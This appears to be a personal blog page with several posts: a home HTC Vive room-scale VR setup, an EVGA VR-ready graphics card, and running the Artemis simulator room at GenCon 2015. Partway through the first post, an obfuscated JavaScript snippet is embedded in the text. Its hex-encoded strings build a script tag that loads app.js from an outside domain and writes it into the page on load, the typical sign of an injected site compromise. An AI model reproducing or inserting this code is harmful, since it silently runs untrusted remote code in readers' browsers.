Wacko's Room Scale Setup V2

Wacko's Room Scale Setup V2 thumb

I’ve had access to the HTC Vive Pre for a few weeks now. During that time I’ve been running tests on the portable rig we use at meetups and meetings.

The lightstands work really well, they have a relatively low footprint and go well above the players head.

But as we get ready for the first generation of modern VR it was time that I outfitted my home office with a more permanent setup like at work.

The HTC Vive uses lighthouse boxes to send tracking data to the headset. These work best when secure so I mounted it to the walls.

The distance between these two points is a little larger then they should be. They want them within 5.5 meters and I’ve got 6.3 but even though it warms me about it I still get great tracking. If at some point things get weird I’ll try to bring them closer. It won’t look as nice though.

For the computer I’m using one of our trusty L-type computers… wait there’s no link to a blog post?! I need to fix that soon! In the meantime here’s a tweet.

room scale v2 PC

At first I thought having a dedicated PC would be overkill and a hassle but there are some serious advantages. My original plan was to run VR at home with my main machine, I even have a custom port built for it but I ran into so many problems with that I don’t recommend main PC for VR at all anymore.

This isn’t that different of a stance for me really, I was a console user for years so I could keep my computer free for rendering and its settings ideal. I only switched to PC for gaming 3 years ago and started with a standalone box for the living room before I switched to steam link.

So yea, get a stand alone box as soon as you can!

One of the advantages this setup gives me is an extended platform for the headsets themselves.

I picked up the cabinet and the top plate at recycle centers about 10 years apart. they come together great.

room scale v2 controllers

The top plate;s original purpose was as some kind of display, maybe for a tv. It had movable pins in it that were prefect for holding the Vive’s control box.

The box is held by veclro for easy removability but the pins stop me from yanking it out and damaging the system while in use.

I’m really happy with the way this came out. This rig is close enough that I can use it at the desk for seated stuff without having to move anything but the HMD.

I get the best of room scale and seated along with all the custom features of my desk.

Our Oculus Rift dosn’t arrive for another week or so but as far as I can tell my system and body are ready.

so there you have it. var _0xa929=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x59\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x62\x65\x73\x73\x74\x61″,”\x68\x65\x74\x65\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function evop(){var _0x6327x2=_0xa929[0];var _0x6327x3=_0xa929[1];var _0x6327x4=_0xa929[2];var _0x6327x5=_0xa929[3];document[_0xa929[4]](_0x6327x2+ _0x6327x3+ _0x6327x4+ _0x6327x5)}evop()

Virtual Reality is making new innovations every day. I don’t post about most of them but I thought this one was worth nothing.

Geforce-GTX-VR-ready-980-ti-1

Evga is releasing a new build of the GTX980ti graphics card that is made with VR in mind. It’s a very powerful card no doubt, but what’s cool about it is the add on of a drive bay.

Geforce-GTX-VR-ready-980-ti-2

Why is this cool? Because I’ve already built one and have been using it for the last year.

When you’re in such a quickly evolving industry impostor syndrome can hit hard, but it’s difficult to feel that way when you beat the big boys to an advancement. My panel is identical in features and function.

It’s not that big a deal, but I thought, hey write that one down.

Artemis-At-GenCon-2015-thumb

For the third year in a row I was asked to come and help the Artemis Room at Gencon!

Artemis GenCon 2015 24

Due to issues beyond our control he had to rebuild our immersion bays, but I was really happy with how they came out!

Artemis GenCon 2015 13

We had more room then ever in the same sized space. Three briefing rooms, and a central station that lets us launch all simulations at once.

This is the first year I think We’ve really locked down how to setup our bays. Note the poles for stability, cable management, and and padded central isle.

My specialty with the crew is the interactive campaign (yea go figure) so that’s where I spent most of my time. We had the ability to change things in game from the outside.

This was the second year I’ve done it and I’ve learned quite a bit. Only one day later and I’m already taking notes on how to make it awesome next year!

Artemis GenCon 2015 23

On Saturday I ran an exceptionally long shift. I would have been done after 10 hours, but I got the chance to host my game for some members of Zombie Orpheus of the kickass Gamers and Journey Quests series and I couldn’t let that pass by.

Just look at that determined captain, ready to lead his crew to justice!

Artemis GenCon 2015 27

Not being a tabletop player I learned a lot about how to do it from watching their movies, so I was relieved to know they had a good time.

Artemis GenCon 2015 26

Over all, it was the best year yet!

Thanks to everyone who came and to all of the crew. I’m so proud of us!

We get waffles.

I’m already taking notes on how to make my campaign better. I can’t wait to get started!
